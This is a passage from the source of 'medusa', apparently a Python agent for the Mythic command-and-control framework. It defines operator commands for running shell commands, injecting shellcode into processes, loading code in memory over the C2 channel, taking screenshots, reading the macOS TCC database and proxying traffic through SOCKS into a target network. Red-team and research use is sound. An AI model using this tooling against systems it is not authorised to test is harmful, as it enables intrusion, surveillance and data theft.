**kwargs) super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="process_id", type=ParameterType.Number, default_value=0, parameter_group_info=[ParameterGroupInfo( required=False, )], description="ID of process to list loaded DLLs of, can be 0 for local process", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == '{': temp_json = json.loads(self.command_line) self.add_arg("process_id", temp_json["process_id"]) else: self.add_arg("process_id", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class ListDllsCommand(CommandBase): cmd = "list_dlls" needs_admin = False help_cmd = "list_dlls [process_id]" description = "List DLLs loaded in current or specified process" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" supported_ui_features = ["process_dlls:list"] argument_class = ListDllsArguments attackmapping = [] browser_script = BrowserScript(script_name="list_dlls", author="@its_a_feature_", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 3.8"], supported_os=[ SupportedOS.Windows ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: process_id = task.args.get_arg("process_id") if process_id == 0: task.display_params = f"Listing DLLs loaded in current process" else: task.display_params = f"Listing DLLs loaded in process with PID: {process_id}" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/list_modules.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class ListModulesArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="module_name", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], description="Provide full file listing for a loaded module.", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("module_name", self.command_line) class ListModulesCommand(CommandBase): cmd = "list_modules" needs_admin = False help_cmd = "list_modules [module_name]" description = "List Python modules loaded in-memory, or a full file listing for a specific module" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = ListModulesArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = f"Listing modules loaded in-memory" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/list_tcc.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class ListTccArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="db", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True )], default_value="/Library/Application Support/com.apple.TCC/TCC.db", description="Path to TCC database", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == '{': temp_json = json.loads(self.command_line) self.add_arg("db", temp_json["db"]) else: self.add_arg("db", self.command_line) else: self.add_arg("db", "/Library/Application Support/com.apple.TCC/TCC.db") self.add_arg("tcc", True, type=ParameterType.Boolean) class ListTccCommand(CommandBase): cmd = "list_tcc" needs_admin = False help_cmd = "list_tcc [db_path]" description = "Lists entries in TCC database (requires Full Disk Access)" version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [] argument_class = ListTccArguments browser_script = BrowserScript(script_name="tcc", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Listing TCC database entries from " + task.args.get_arg("db") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/load.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json, base64, os class LoadArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="command", type=ParameterType.ChooseOne, description="Command to load into the agent", dynamic_query_function=self.get_commands ), ] # async def get_commands(self, callback: dict) -> [str]: async def get_commands(self, inputMsg: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse: fileResponse = PTRPCDynamicQueryFunctionMessageResponse(Success=False) callbacks = await SendMythicRPCCallbackSearch(MythicRPCCallbackSearchMessage( SearchCallbackID=inputMsg.Callback, AgentCallbackID=inputMsg.Callback )) payload_os = "" python_version = "" if callbacks.Success: payloads = await SendMythicRPCPayloadSearch(MythicRPCPayloadSearchMessage( CallbackID=inputMsg.Callback, PayloadUUID=callbacks.Results[0].RegisteredPayloadUUID )) if payloads.Success: payload_os = payloads.Payloads[0].SelectedOS python_version = [param.Value for param in payloads.Payloads[0].BuildParameters if param.Name == 'python_version'][0] else: raise Exception(f"Failed to get payload: {payloads.Error}") else: raise Exception(f"Failed to get callback: {callbacks.Error}") all_cmds = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage( SearchPayloadTypeName="medusa", SearchOS=payload_os, SearchAttributes={ "supported_python_versions": [python_version], }, )) loaded_cmds = await SendMythicRPCCallbackSearchCommand(MythicRPCCallbackSearchCommandMessage( CallbackID=inputMsg.Callback )) if not all_cmds.Success: raise Exception("Failed to get commands for medusa agent: {}".format(all_cmds.Error)) if not loaded_cmds.Success: raise Exception("Failed to fetch loaded commands from callback {}: {}".format(inputMsg.Callback, loaded_cmds.Error)) all_cmds_names = set([r.Name for r in all_cmds.Commands]) loaded_cmds_names = set([r.Name for r in loaded_cmds.Commands]) logger.info(all_cmds_names) logger.info(loaded_cmds_names) diff = all_cmds_names.difference(loaded_cmds_names) fileResponse.Success = True fileResponse.Choices = sorted(diff) return fileResponse async def parse_arguments(self): if self.command_line[0] != "{": self.add_arg("command", self.command_line) else: self.load_args_from_json_string(self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class LoadCommand(CommandBase): cmd = "load" needs_admin = False help_cmd = "load" description = "This loads new functions into memory via the C2 channel." version = 1 author = "@ajpc500" parameters = [] attackmapping = ["T1030", "T1129"] argument_class = LoadArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) command = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage( SearchPayloadTypeName="medusa", SearchCommandNames=[taskData.args.get_arg("command")], SearchOS=taskData.Payload.OS )) build_params = taskData.BuildParameters for build_param in build_params: if build_param.Name == 'python_version': py_ver = build_param.Value py_suffix = ".py2" if py_ver == "Python 2.7" else ".py3" cmd_code = "" if command.Success: loadingCommand = "" for cmd in command.Commands: try: path = "" for func in os.listdir(self.agent_code_path): if (func.endswith(py_suffix) or func.endswith(".py")) and cmd.Name == func.split(".")[0]: path = func break code_path = self.agent_code_path / "{}".format(path) cmd_code = open(code_path, "r").read() + "\n" loadingCommand = cmd.Name except Exception as e: await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage( TaskID=taskData.Task.ID, Response=f"Failed to find code for {cmd.Name}, skipping it\n".encode() )) if cmd_code != "": resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage( TaskID=taskData.Task.ID, Comment=f"Loading the following command: {loadingCommand}\n", FileContents=cmd_code.encode(), Filename=f"medusa load command", DeleteAfterFetch=True )) if resp.Success: taskData.args.add_arg("file_id", resp.AgentFileId) response.DisplayParams = f"command: {loadingCommand}" else: raise Exception("Failed to register file: " + resp.Error) else: response.Completed = True response.DisplayParams = f"no command" return response else: raise Exception("Failed to fetch commands from Mythic: " + commands.Error) return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/load_dll.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class LoadDllArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="dllpath", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=1 )], description="Location of on-disk DLL", ), CommandParameter( name="dllexport", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=2 )], description="Export of target DLL", ), ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("dllpath", pieces[0]) self.add_arg("dllexport", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) class LoadDllCommand(CommandBase): cmd = "load_dll" needs_admin = False help_cmd = "load_dll dll_path dll_export" description = "Load DLL from disk" version = 1 author = "@ajpc500" attackmapping = [ "T1059.006", "T1127" ] argument_class = LoadDllArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.Windows], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Executing " + str(task.args.get_arg("dllpath")) + " with export '" task.display_params += str(task.args.get_arg("dllexport")) + "'" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/load_module.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys import base64 class LoadModuleArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.File, description="Zipped library to upload" ), CommandParameter( name="module_name", type=ParameterType.String, description="Name of module to load, e.g. cryptography" ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: raise ValueError("Missing JSON arguments") else: raise ValueError("Missing arguments") class LoadModuleCommand(CommandBase): cmd = "load_module" needs_admin = False help_cmd = "load_module" description = ( "Upload a python library and load it in-memory" ) version = 1 author = "@ajpc500" attackmapping = [] argument_class = LoadModuleArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: try: file_resp = await MythicRPC().execute( "get_file", task_id=task.id, file_id=task.args.get_arg("file"), get_contents=False ) if file_resp.status == MythicRPCStatus.Success: if len(file_resp.response) > 0: task.display_params = f"Loading {task.args.get_arg('module_name')} module into memory" elif len(file_resp.response) == 0: raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?") else: raise Exception("Error from Mythic RPC: " + str(file_resp.error)) file_resp = await MythicRPC().execute("update_file", file_id=task.args.get_arg("file"), delete_after_fetch=True, comment="Uploaded into memory for load_module") except Exception as e: raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + str(e)) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/load_script.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys import base64 class LoadScriptArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.File, description="script to load" ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: raise ValueError("Missing JSON arguments") else: raise ValueError("Missing arguments") class LoadScriptCommand(CommandBase): cmd = "load_script" needs_admin = False help_cmd = "load_script" description = ( "Load a Python script into the agent. Functions in the script can be added to the agent class with setattr() and called with the eval_code function if needed" ) version = 1 author = "@ajpc500" attackmapping = [] argument_class = LoadScriptArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: file_resp = await MythicRPC().execute( "get_file", task_id=task.id, file_id=task.args.get_arg("file"), get_contents=False ) if file_resp.status == MythicStatus.Success: original_file_name = file_resp.response[0]["filename"] task.display_params = f"Loading script: {original_file_name}" else: raise Exception("Failed to register file: " + file_resp.error) file_resp = await MythicRPC().execute("update_file", file_id=task.args.get_arg("file"), delete_after_fetch=True, comment="Uploaded into memory for load_script") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/ls.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class LsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], description="Path of file or folder on the current system to list", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == '{': temp_json = json.loads(self.command_line) if "host" in temp_json: self.add_arg("path", temp_json["path"] + "/" + temp_json["file"]) self.add_arg("file_browser", True, type=ParameterType.Boolean) else: self.add_arg("path", temp_json["path"]) else: self.add_arg("path", self.command_line) else: self.add_arg("path", ".") class LsCommand(CommandBase): cmd = "ls" needs_admin = False help_cmd = "ls [/path/to/file]" description = "Get attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine" version = 1 author = "@ajpc500" attackmapping = ["T1083"] supported_ui_features = ["file_browser:list"] is_file_browse = True argument_class = LsArguments browser_script = BrowserScript(script_name="ls", author="@its_a_feature_", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.has_arg("file_browser") and task.args.get_arg("file_browser"): host = task.callback.host task.display_params = host + ":" + task.args.get_arg("path") else: task.display_params = task.args.get_arg("path") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/mv.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class MvArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="destination", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=2 )], description="Location for moved file or folder", ), CommandParameter( name="source", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=1 )], description="Path to file or folder for moving", ), ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("source", pieces[0]) self.add_arg("destination", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) class MvCommand(CommandBase): cmd = "mv" needs_admin = False help_cmd = "mv source destination" description = "Move file or folder to destination" version = 1 author = "@ajpc500" attackmapping = [] argument_class = MvArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Moving " + str(task.args.get_arg("source")) + " to " task.display_params += str(task.args.get_arg("destination")) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/pip_freeze.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class PipFreezeArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class PipFreezeCommand(CommandBase): cmd = "pip_freeze" needs_admin = False help_cmd = "pip_freeze" description = "This programmatically lists all installed modules." version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = PipFreezeArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/ps.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class PsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class PsCommand(CommandBase): cmd = "ps" needs_admin = False help_cmd = "ps" description = "Get limited process listing" version = 2 author = "@ajpc500" attackmapping = ["T1106"] supported_ui_features = ["process_browser:list"] argument_class = PsArguments browser_script = BrowserScript(script_name="ps", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=[ "Python 2.7", "Python 3.8" ], supported_os=[ SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Getting limited process listing" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/ps_full.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class PsFullArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class PsFullCommand(CommandBase): cmd = "ps_full" needs_admin = False help_cmd = "ps_full" description = "Get full process listing." version = 2 author = "@ajpc500" attackmapping = ["T1106"] supported_ui_features = ["process_browser:list"] argument_class = PsFullArguments browser_script = BrowserScript(script_name="ps_full", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=[ "Python 3.8" ], supported_os=[ SupportedOS.Windows ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Getting full process listing" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/rm.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class RmArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True )], description="Read and output the content of a file", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": temp_json = json.loads(self.command_line) if "host" in temp_json: # this means we have tasking from the file browser rather than the popup UI # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it self.add_arg("path", temp_json["path"] + "/" + temp_json["file"]) else: self.add_arg("path", temp_json["path"]) else: self.add_arg("path", self.command_line) else: raise ValueError("Missing arguments") class RmCommand(CommandBase): cmd = "rm" needs_admin = False help_cmd = "rm /path/to/file" description = "Delete a file or folder" version = 1 author = "@ajpc500" attackmapping = [ "T1485" ] supported_ui_features = ["file_browser:remove"] argument_class = RmArguments browser_script = BrowserScript(script_name="ls", author="@its_a_feature_") attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Deleting " + str(task.args.get_arg("path")) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/screenshot.py ================================================ from mythic_container.MythicCommandBase import * import json import datetime from mythic_container.MythicRPC import * from mythic_container.PayloadBuilder import * class ScreenshotArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class ScreenshotCommand(CommandBase): cmd = "screenshot" needs_admin = False help_cmd = "screenshot" description = "Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel." version = 1 author = "@ajpc500" parameters = [] attackmapping = ["T1113"] argument_class = ScreenshotArguments browser_script = BrowserScript(script_name="screenshot", author="@its_a_feature_", for_new_ui=True) attributes = CommandAttributes( filter_by_build_parameter={ "python_version": "Python 2.7" }, supported_python_versions=["Python 2.7"], supported_os=[ SupportedOS.MacOS ] ) async def create_tasking(self, task: MythicTask) -> MythicTask: resp = await MythicRPC().execute("create_artifact", task_id=task.id, artifact="CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)", artifact_type="API Called", ) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/shell.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * class ShellArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="command", type=ParameterType.String, description="Command to run" ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise ValueError("Must supply a command to run") self.add_arg("command", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class ShellCommand(CommandBase): cmd = "shell" needs_admin = False help_cmd = "shell {command}" description = "This runs {command} in a terminal." version = 1 author = "@ajpc500" attackmapping = ["T1059"] argument_class = ShellArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS, SupportedOS.Linux, SupportedOS.Windows ] ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = task.args.get_arg("command") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/shinject.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys import base64 class ShinjectArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="shellcode", type=ParameterType.File, description="Shellcode to inject" ), CommandParameter( name="process_id", type=ParameterType.Number, description="ID of process to inject into", ), ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: raise ValueError("Missing JSON arguments") else: raise ValueError("Missing arguments") class ShinjectCommand(CommandBase): cmd = "shinject" needs_admin = False help_cmd = "shinject" description = ( "Inject shellcode from local file into target process" ) version = 1 supported_ui_features = ["process_browser:inject"] author = "@ajpc500" attackmapping = [ "T1055" ] argument_class = ShinjectArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.Windows ] ) async def create_tasking(self, task: MythicTask) -> MythicTask: try: file_resp = await MythicRPC().execute( "get_file", task_id=task.id, file_id=task.args.get_arg("shellcode"), get_contents=False ) if file_resp.status == MythicStatus.Success: original_file_name = file_resp.response[0]["filename"] if len(file_resp.response) > 0: task.display_params = "Injecting {} into PID {}".format(original_file_name, task.args.get_arg("process_id")) elif len(file_resp.response) == 0: raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?") file_resp = await MythicRPC().execute("update_file", file_id=task.args.get_arg("shellcode"), delete_after_fetch=True, comment="Uploaded into memory for shinject" ) except Exception as e: raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + str(e)) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/sleep.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json def positiveTime(val): if val < 0: raise ValueError("Value must be positive") class SleepArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="jitter", type=ParameterType.Number, validation_func=positiveTime, default_value=-1, parameter_group_info=[ParameterGroupInfo( required=False, ui_position=2 )], description="Percentage of C2's interval to use as jitter", ), CommandParameter( name="seconds", type=ParameterType.Number, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=1 )], validation_func=positiveTime, description="Number of seconds between checkins", ), ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 1: self.add_arg("seconds", pieces[0]) self.remove_arg("jitter") elif len(pieces) == 2: self.add_arg("seconds", pieces[0]) self.add_arg("jitter", pieces[1]) else: raise Exception("Wrong number of parameters, should be 1 or 2") else: self.load_args_from_json_string(self.command_line) class SleepCommand(CommandBase): cmd = "sleep" needs_admin = False help_cmd = "sleep seconds jitter_percentage" description = "set sleep and jitter" version = 1 author = "@ajpc500" attackmapping = [] argument_class = SleepArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = str(task.args.get_arg("seconds")) + "s" if int(task.args.get_arg("jitter")) != -1: task.display_params += " with " + str(task.args.get_arg("jitter")) + "% jitter" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) await SendMythicRPCCallbackUpdate(MythicRPCCallbackUpdateMessage( TaskID=task.Task.ID, SleepInfo=response, )) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/socks.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class SocksArguments(TaskArguments): valid_actions = ["start", "stop"] def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="action", choices=["start","stop"], parameter_group_info=[ParameterGroupInfo( required=True )], type=ParameterType.ChooseOne, description="Start or stop the socks server." ), CommandParameter( name="port", parameter_group_info=[ParameterGroupInfo( required=False )], type=ParameterType.Number, description="Port to start the socks server on." ), ] async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) async def parse_arguments(self): if len(self.command_line) == 0: raise Exception("Must be passed \"start\" or \"stop\" commands on the command line.") try: self.load_args_from_json_string(self.command_line) except: parts = self.command_line.lower().split() action = parts[0] if action not in self.valid_actions: raise Exception("Invalid action \"{}\" given. Require one of: {}".format(action, ", ".join(self.valid_actions))) self.add_arg("action", action) if action == "start": port = -1 if len(parts) < 2: port = 7005 else: try: port = int(parts[1]) except Exception as e: raise Exception("Invalid port number given: {}. Must be int.".format(parts[1])) self.add_arg("port", port, ParameterType.Number) class SocksCommand(CommandBase): cmd = "socks" needs_admin = False help_cmd = "socks [action] [port number]" description = "Enable SOCKS 5 compliant proxy on the agent such that you may proxy data in from an outside machine into the target network." version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_upload_file = False is_remove_file = False author = "@ajpc500" argument_class = SocksArguments attackmapping = ["T1090"] attributes = CommandAttributes( supported_python_versions=["Python 3.8", "Python 2.7"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) if taskData.args.get_arg("action") == "start": resp = await SendMythicRPCProxyStartCommand(MythicRPCProxyStartMessage( TaskID=taskData.Task.ID, PortType="socks", LocalPort=taskData.args.get_arg("port") )) if not resp.Success: response.TaskStatus = MythicStatus.Error response.Stderr = resp.Error await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage( TaskID=taskData.Task.ID, Response=resp.Error.encode() )) else: response.DisplayParams = "Started SOCKS5 server on port {}".format(taskData.args.get_arg("port")) else: resp = await SendMythicRPCProxyStopCommand(MythicRPCProxyStopMessage( TaskID=taskData.Task.ID, PortType="socks", Port=taskData.args.get_arg("port") )) if not resp.Success: response.TaskStatus = MythicStatus.Error response.Stderr = resp.Error await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage( TaskID=taskData.Task.ID, Response=resp.Error.encode() )) else: 